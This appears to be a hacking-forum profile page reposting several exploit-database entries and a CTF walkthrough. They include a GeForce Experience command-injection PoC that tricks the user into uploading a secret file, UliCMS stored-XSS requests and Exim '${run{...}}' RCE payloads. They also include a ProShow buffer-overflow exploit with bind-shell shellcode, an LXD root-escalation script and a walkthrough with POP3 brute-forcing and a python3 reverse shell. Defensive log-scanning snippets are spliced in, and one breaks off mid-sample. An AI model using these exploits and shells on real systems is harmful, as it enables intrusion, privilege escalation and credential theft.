
HireHackking


Everything posted by HireHackking

  1. <!-- POC for CVE-2019-5678 Nvidia GeForce Experience OS command injection via a web browser
     Author: David Yesland -- Rhino Security Labs -->
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</head>
<body>
<script>
// Send request to local GFE server
function submitRequest(port, secret) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/127.0.0.1:" + port + "\/gfeupdate\/autoGFEInstall\/", true);
    xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "text\/html");
    xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret);
    var body = "\"" + document.getElementById("cmd").value + "\"";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}

$(document).on('change', '.file-upload-button', function(event) {
    var reader = new FileReader();
    reader.onload = function(event) {
        var jsonObj = JSON.parse(event.target.result);
        submitRequest(jsonObj.port, jsonObj.secret);
    }
    reader.readAsText(event.target.files[0]);
});

// Copy text from some text field
function myFunction() {
    var copyText = document.getElementById("myInput");
    copyText.select();
    document.execCommand("copy");
}

// trigger the copy and file window on ctrl press
$(document).keydown(function(keyPressed) {
    if (keyPressed.keyCode == 17) {
        myFunction();
        document.getElementById('file-input').click();
    }
});
</script>
<h2> Press CTRL+V+Enter </h2>
<!--Command to run in a hidden input field-->
<input type="hidden" value="calc.exe" id="cmd" size="55">
<!--Hidden text box to copy text from-->
<div style="opacity: 0.0;">
<input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json" id="myInput" size="1">
</div>
<!--file input-->
<input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class='file-upload-button' type="file" name="name" style="display: none;" />
</body>
</html>
  2. # Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Date: 2019-05-12
# Exploit Author: Unk9vvN
# Vendor Homepage: https://en.ulicms.de
# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig
# Version: 2019.1
# Tested on: Kali Linux
# CVE : CVE-2019-11398

# Description
# This vulnerability is in the authenticated state and is located in the CMS management panel; the vulnerability type is Stored, and the vulnerable parameters are as follows.

# Vuln One
# URI: POST /ulicms/admin/index.php?action=languages
# Parameter: name="><script>alert('UNK9VVN')</script>

# Vuln Two
# URI: POST /ulicms/admin/index.php?action=pages_edit&page=23
# Parameter: systemname="><script>alert('UNK9VVN')</script>

#
# PoC POST (Cross Site Scripting Stored)
#
POST /ulicms/admin/index.php HTTP/1.1
Host: XXXXXXXX.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E

#
# PoC POST (Cross Site Scripting Stored)
#
POST /ulicms/admin/index.php HTTP/1.1
Host: XXXXXXXX.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 904
Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
Connection: close
DNT: 1

csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content=

# Discovered by: t.me/Unk9vvN
  3. CVE-2019-0841 BYPASS #2

There is a second bypass for CVE-2019-0841. This can be triggered as follows:

Delete all files and subfolders within "c:\users\%username%\appdata\local\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\" (at least the ones we can delete as user). Try to launch Edge. It will crash the first time. When we launch it a second time, it will write the DACL while impersonating "SYSTEM".

The trick here is to launch Edge by clicking it on the taskbar or desktop; using "start microsoft-edge:" seems to result in correct impersonation. You can still do this completely programmatically.. since Edge will always be in the same position in the taskbar.. *cough* sendinput *cough*. There are probably other ways too.

Another note: this bug is most definitely not restricted to Edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having Edge pop up. Or you could probably minimize Edge as soon as it launches and close it as soon as the bug completes. I think it will also trigger by just launching Edge once, but sometimes you may have to wait a little. I didn't do extensive testing.. found this bug and quickly wrote up a PoC, took me like 2 hours total, finding LPEs is easy.

To repro:
1. Launch my poc
2. Launch Edge several times

Use the video demo as guidance.

Also, I don't get paid for dropping bugs, so if you want a simple and full exploit, then go fucking write it yourself, I have better things to do, such as preparing my voyage into the arctic. You're welcome.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Make sure you have multiple cores in your VM (not multiple processors, multiple cores). It's going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes it means you either have 1 core or set your VM to have multiple processors instead of multiple cores, which will also cause it to lock up.

EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46976.zip
  4. Qualys Security Advisory

The Return of the WIZard: RCE in Exim (CVE-2019-10149)

========================================================================
Contents
========================================================================

Summary
Local exploitation
Remote exploitation
- Non-default configurations
- Default configuration
Acknowledgments
Timeline

    Boromir: "What is this new devilry?"
    Gandalf: "A Balrog. A demon of the Ancient World."
        -- The Lord of the Rings: The Fellowship of the Ring

========================================================================
Summary
========================================================================

During a code review of the latest changes in the Exim mail server
(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability
in versions 4.87 to 4.91 (inclusive). In this particular case, RCE means
Remote *Command* Execution, not Remote Code Execution: an attacker can
execute arbitrary commands with execv(), as root; no memory corruption or
ROP (Return-Oriented Programming) is involved.

This vulnerability is exploitable instantly by a local attacker (and by a
remote attacker in certain non-default configurations). To remotely
exploit this vulnerability in the default configuration, an attacker must
keep a connection to the vulnerable server open for 7 days (by
transmitting one byte every few minutes). However, because of the extreme
complexity of Exim's code, we cannot guarantee that this exploitation
method is unique; faster methods may exist.

Exim is vulnerable by default since version 4.87 (released on April 6,
2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and
older versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled
manually.

Surprisingly, this vulnerability was fixed in version 4.92 (released on
February 10, 2019):

https://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...
https://bugs.exim.org/show_bug.cgi?id=2310

but was not identified as a security vulnerability, and most operating
systems are therefore affected. For example, we exploit an up-to-date
Debian distribution (9.9) in this advisory.

========================================================================
Local exploitation
========================================================================

The vulnerable code is located in deliver_message():

6122 #ifndef DISABLE_EVENT
6123   if (process_recipients != RECIP_ACCEPT)
6124     {
6125     uschar * save_local =  deliver_localpart;
6126     const uschar * save_domain = deliver_domain;
6127
6128     deliver_localpart = expand_string(
6129       string_sprintf("${local_part:%s}", new->address));
6130     deliver_domain =    expand_string(
6131       string_sprintf("${domain:%s}", new->address));
6132
6133     (void) event_raise(event_action,
6134       US"msg:fail:internal", new->message);
6135
6136     deliver_localpart = save_local;
6137     deliver_domain =    save_domain;
6138     }
6139 #endif

Because expand_string() recognizes the "${run{<command> <args>}}"
expansion item, and because new->address is the recipient of the mail
that is being delivered, a local attacker can simply send a mail to
"${run{...}}@localhost" (where "localhost" is one of Exim's
local_domains) and execute arbitrary commands, as root
(deliver_drop_privilege is false, by default):

[...]

========================================================================
Remote exploitation
========================================================================

Our local-exploitation method does not work remotely, because the
"verify = recipient" ACL (Access-Control List) in Exim's default
configuration requires the local part of the recipient's address (the
part that precedes the @ sign) to be the name of a local user:

[...]

------------------------------------------------------------------------
Non-default configurations
------------------------------------------------------------------------

We eventually devised an elaborate method for exploiting Exim remotely in
its default configuration, but we first identified various non-default
configurations that are easy to exploit remotely:

- If the "verify = recipient" ACL was removed manually by an
  administrator (maybe to prevent username enumeration via RCPT TO),
  then our local-exploitation method also works remotely.

- If Exim was configured to recognize tags in the local part of the
  recipient's address (via "local_part_suffix = +* : -*" for example),
  then a remote attacker can simply reuse our local-exploitation method
  with an RCPT TO "balrog+${run{...}}@localhost" (where "balrog" is the
  name of a local user).

- If Exim was configured to relay mail to a remote domain, as a
  secondary MX (Mail eXchange), then a remote attacker can simply reuse
  our local-exploitation method with an RCPT TO "${run{...}}@khazad.dum"
  (where "khazad.dum" is one of Exim's relay_to_domains). Indeed, the
  "verify = recipient" ACL can only check the domain part of a remote
  address (the part that follows the @ sign), not the local part.

------------------------------------------------------------------------
Default configuration
------------------------------------------------------------------------

[...]

========================================================================
Acknowledgments
========================================================================

We thank Exim's developers, Solar Designer, and the members of
distros@openwall.

"The Return of the WIZard" is a reference to Sendmail's ancient WIZ and
DEBUG vulnerabilities:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145
https://seclists.org/bugtraq/1995/Feb/56
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095
http://www.cheswick.com/ches/papers/berferd.pdf

========================================================================
Timeline
========================================================================

2019-05-27: Advisory sent to security@exim.

2019-05-28: Advisory sent to distros@openwall.
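The recipient shapes the advisory lists ("${run{...}}@localhost", "balrog+${run{...}}@localhost", "${run{...}}@khazad.dum") share one property that no legitimate mailbox has: an Exim string-expansion item in the local part. The following Python is an added example, not part of the Qualys advisory; it flags such recipients in log text. The sample lines are constructed to resemble Exim's mainlog and rejectlog and the field layout is an assumption, not a parser for every Exim log format.

```python
import re

# An Exim string-expansion item: "${run{...}}", "${lookup{...}}", "${readfile{...}}" and so on.
EXPANSION_RE = re.compile(r"\$\{\s*[A-Za-z_]+")

# Constructed sample in roughly Exim mainlog/rejectlog shape; recipients mirror the
# three forms the advisory gives. Field layout is an assumption about the log format.
SAMPLE_LOG = """\
2019-06-05 10:00:01 H=(mx.example.net) [203.0.113.7] F=<a@example.net> rejected RCPT <nosuchuser@localhost>: Unrouteable address
2019-06-05 10:00:02 H=(mx.example.net) [203.0.113.7] F=<a@example.net> rejected RCPT <${run{...}}@localhost>: Unrouteable address
2019-06-05 10:00:03 1hYxQn-0001Fv-1R <= a@example.net H=(mx.example.net) [203.0.113.7] P=esmtp S=1234 for balrog+${run{...}}@localhost
2019-06-05 10:00:04 1hYxQo-0001Fw-2S <= ok@example.org H=(mail.example.org) [198.51.100.9] P=esmtp S=987 for alice@localhost
2019-06-05 10:00:05 1hYxQp-0001Fx-3T <= a@example.net H=(mx.example.net) [203.0.113.7] P=esmtp S=1234 for ${run{...}}@khazad.dum
"""

# Two places a recipient shows up in the sample: "rejected RCPT <...>" and "... for <addr>".
RCPT_RE = re.compile(r"RCPT <([^>]+)>|\bfor (\S+)")


def local_part(address: str) -> str:
    """Text before the last '@'; an address without '@' is treated as all local part."""
    addr = address.strip().strip("<>")
    head, sep, _domain = addr.rpartition("@")
    return head if sep else addr


def is_expansion_injection(address: str) -> bool:
    """True when the local part carries an expansion item. A real mailbox name never does,
    and neither does a normal "+tag" suffix."""
    return EXPANSION_RE.search(local_part(address)) is not None


def suspicious_recipients(log_text: str) -> list:
    """(line number, recipient) for each log line whose recipient carries an expansion item."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for m in RCPT_RE.finditer(line):
            rcpt = m.group(1) or m.group(2)
            if rcpt and is_expansion_injection(rcpt):
                hits.append((n, rcpt))
    return hits


if __name__ == "__main__":
    for n, rcpt in suspicious_recipients(SAMPLE_LOG):
        print("line %d: expansion item in recipient %s" % (n, rcpt))
```

In the default configuration the "verify = recipient" ACL already turns the first form into a rejected RCPT, so it lands in the reject log; the scan still tells you whether anyone probed for the bug. In the relay and local_part_suffix configurations the advisory describes, the same pattern appears on accepted messages, which is why the scan looks at both kinds of line.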
  5. #!/usr/bin/python
# _*_ coding:utf-8 _*_
# Exploit Title: ProShow v9.0.3797 Local Exploit
# Exploit Author: @Yonatan_Correa
# website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
# Vendor Homepage: http://www.photodex.com/ProShow
# Software Link: http://files.photodex.com/release/pspro_90_3797.exe
# Version: v9.0.3797
# Tested on: Windows 7

from struct import pack

informacion = """
ProShow v9.0.3797
http://www.photodex.com/ProShow

execute exploit
create a file called "load"
copy load "C:\Program Files\Photodex\ProShow Producer\"
"C:\Program Files\Photodex\ProShow Producer\proshow.exe"

And connect
nc -nv IP_Host 4444

Testing: Windows 7

@Yonatan_Correa
https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
"""

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c
# Payload size: 717 bytes
shell = "yonayona" + ("\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
"\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59"
"\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e"
"\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52"
"\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e"
"\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51"
"\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42"
"\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b"
"\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52"
"\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49"
"\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53"
"\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d"
"\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53"
"\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78"
"\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56"
"\x6c\x50\x4b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b"
"\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64"
"\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f"
"\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x4b\x4c"
"\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38"
"\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51"
"\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71"
"\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46"
"\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78"
"\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30"
"\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55"
"\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d"
"\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b"
"\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a"
"\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34"
"\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33"
"\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38"
"\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76"
"\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66"
"\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76"
"\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70"
"\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56"
"\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59"
"\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70"
"\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47"
"\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54"
"\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f"
"\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b"
"\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f"
"\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41")

junk = shell + ("\x41" * 9479)  # 10204
nseh = "\xEB\x06\x90\x90"
seh = pack('<I', 0x10045f50)  # pop pop ret
nop = "\x90" * 86
nop2 = "\x90" * 10
egg = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x79\x6f\x6e\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

todo = junk + nseh + seh + nop + egg + nop2

arch = open("load", "wb")
arch.write(todo)
arch.close()

print informacion
print "\nCreated File size " + str(len(todo))
  6. #!/usr/bin/env bash
# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#          Victor Lasa (vowkin)
# ----------------------------------

# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import "$filename" --alias alpine && lxd init --auto
  echo -e "[*] Listing images...\n" && lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0
# -h takes no argument, so it must not carry a trailing colon in the optstring
while getopts ":f:h" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi
  7. 1. Information gathering

1. Scan for live hosts

arp-scan -l

We found that 192.168.1.13 is the IP address of the target machine.

2. Port scan

Next, scan the target IP address with nmap. The command is as follows:

root@kali2018:~# nmap -A 192.168.1.13
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 01:18 EST
Nmap scan report for 192.168.1.13
Host is up (0.0014s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9D:2:67:34:CF:0A:D5:5A:9A:113:74:BD33333333333333333333:DSE3333333333:DS)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b13:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE UIDL SASL(PLAIN) PIPELINING USER CAPA TOP RESP-CODES
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: OK
MAC Address: 08:00:27:1E:80:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.38 ms 192.168.1.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.44 seconds

The scan results show that four ports are open: 22 (SSH), 80 (HTTP), 110 (POP3) and 143 (IMAP).

2. Compromising the target machine

1. First, check whether port 80 yields anything. Open a browser and visit it.

It looks like a static HTML page; scrolling down, the announcement gives a Twitter handle: @fowsniffcorp

Nothing was found on the page, and continuing to scan with dirb and nikto gained nothing either:

root@kali2018:~# dirb http://192.168.1.13
root@kali2018:~# nikto -h http://192.168.1.13

So I googled the "Fowsniff Corp" shown on the page and found the Fowsniff Twitter account (@fowsniffcorp) with a pinned tweet.

After opening the linked address https://pastebin.com/nraqveex, the page shows the email users and passwords leaked from the site's mailbox.

The passwords are MD5 hashes and can be cracked with somd5 (https://www.somd5.com/batch.html) or hashcat.

Next, build username and password dictionaries and brute-force POP3 with Hydra.

First, paste all usernames into user.txt and save it; paste all passwords into pass.txt and save it.

POP3 logins can also be brute-forced with MSF. The commands and configuration are as follows:

msf > use auxiliary/scanner/pop3/pop3_login
msf auxiliary(scanner/pop3/pop3_login) > set RHOSTS 192.168.1.13
RHOSTS => 192.168.1.13
msf auxiliary(scanner/pop3/pop3_login) > set USER_FILE /opt/user.txt
USER_FILE => /opt/user.txt
msf auxiliary(scanner/pop3/pop3_login) > set PASS_FILE /opt/pass.txt
PASS_FILE => /opt/pass.txt
msf auxiliary(scanner/pop3/pop3_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(scanner/pop3/pop3_login) > exploit

After running it, the valid credentials "seina:scoobydoo2" were found, as shown in the figure.

The mail accounts are brute-forced with Hydra as follows:

hydra -L users.txt -P pass.txt -f {ip} pop3
-L  username wordlist
-P  password wordlist
-f  stop cracking once a valid user is found

root@kali2018:/opt# hydra -L user.txt -P pass.txt -f 192.168.1.13 pop3

You can see that the username seina and its password were cracked successfully.

Next, connect to the target's POP3 service and log in with the credentials just obtained. After logging in, check the mailbox and find two messages. The commands are as follows:

root@kali2018:/opt# nc 192.168.1.13 110
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
+OK
pass scoobydoo2
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280

The list command shows whether there is any mail; there are two messages. A message is read with RETR [ID].

Looking at the content of the first message, we find that the temporary password for SSH is "s1ck3nbluff+secureShell".

retr 1
+OK 1622 octets
Return-Path: stone@fowsniff
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
        id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: Urgent! Security event!
Message-Id: 20180313185107.0FA3916A@fowsniff
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear all,

A few days ago, a malicious actor was able to gain entry to our internal email system. The attacker was able to exploit incorrectly filtered escape characters within our SQL database to access our login credentials. Both the SQL and authentication systems used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system overhaul. While the main systems are "in the shop", we have moved to this isolated, temporary server with minimal functionality.

This server is able to send and receive mail, but only locally. That means you can only email other users, not the World Wide Web. You can, however, access this system via the SSH protocol.

The temporary password for SSH is "s1ck3nbluff+secureShell"

You must change this password as soon as possible, and you will do so under my guidance. I saw the leak the attacker posted online, and I must say that your passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone

Next, check the second message. In it, the sender is baksteen@fowsniff, from which we can infer the username baksteen.

retr 2
+OK 1280 octets
Return-Path: baksteen@fowsniff
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
        id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: 20180313185405.101CA1AC2@fowsniff
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today! We are going to be talking about this one for a long time. Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or whatever it is you brought back from your camping trip, but I think I'm coming down with it myself. How long were you gone - a week? Next time you're going to get sick and miss the managerial blowout of the century, at least keep it to yourself!

I'm going home early to eat some chicken soup. I think I got an email from Stone too, but it's probably just some face-saving "let me explain the tone of my meeting with management" thing. I'll read it when I get back.

Feel better,
Skyler

PS: Change your email password. AJ was telling us to do that right before the captain's profanity showed up.

Next, log in over SSH with the credentials just obtained, i.e. username: baksteen, password: s1ck3nbluff+secureShell

root@kali2018:/opt# ssh baksteen@192.168.1.13

3. Privilege escalation

1. First method of privilege escalation

Login succeeded. After enumerating the system, we found that the user baksteen belongs to two different groups. We tried to find files belonging to the users group and found the script "cube.sh". The find command is as follows:

baksteen@fowsniff:~$ find / -group users -type f 2>/dev/null

Checking the contents of this script, we found that it holds the banner text shown after logging in over SSH. You can see this by comparing it with the screenshot taken right after the successful SSH login in the picture above.

baksteen@fowsniff:~$ cd /opt/cube
baksteen@fowsniff:/opt/cube$ ls
baksteen@fowsniff:/opt/cube$ cat cube.sh

Open the file with vim and append a line with a Python reverse-shell command at the end of the file:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.21",1234))

As shown in the picture:

After saving, we tried to run the script and got an error. The error message is "python: command not found". So we searched the system for Python and found that python3 is installed, as shown in the figure.

So we changed the command to use python3 for the reverse shell, as follows:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
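The foothold in the walkthrough above is a leaked password list sprayed against POP3 with Hydra or Metasploit. On the server side that activity leaves a distinctive trail in Dovecot's login logs: one client IP failing against many different mailboxes within seconds, then succeeding against one. The following Python is an added example, not part of the walkthrough; the Dovecot lines are constructed to mirror its default syslog format and the usernames are those from the walkthrough, so the log text and thresholds are assumptions rather than captured data.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Dovecot login-process lines (default syslog format); not captured from the box.
SAMPLE_LOG = """\
Mar 13 14:40:01 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<stone>, method=PLAIN, rip=192.168.1.21, lip=192.168.1.13, session=<a1>
Mar 13 14:40:02 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mauer>, method=PLAIN, rip=192.168.1.21, lip=192.168.1.13, session=<a2>
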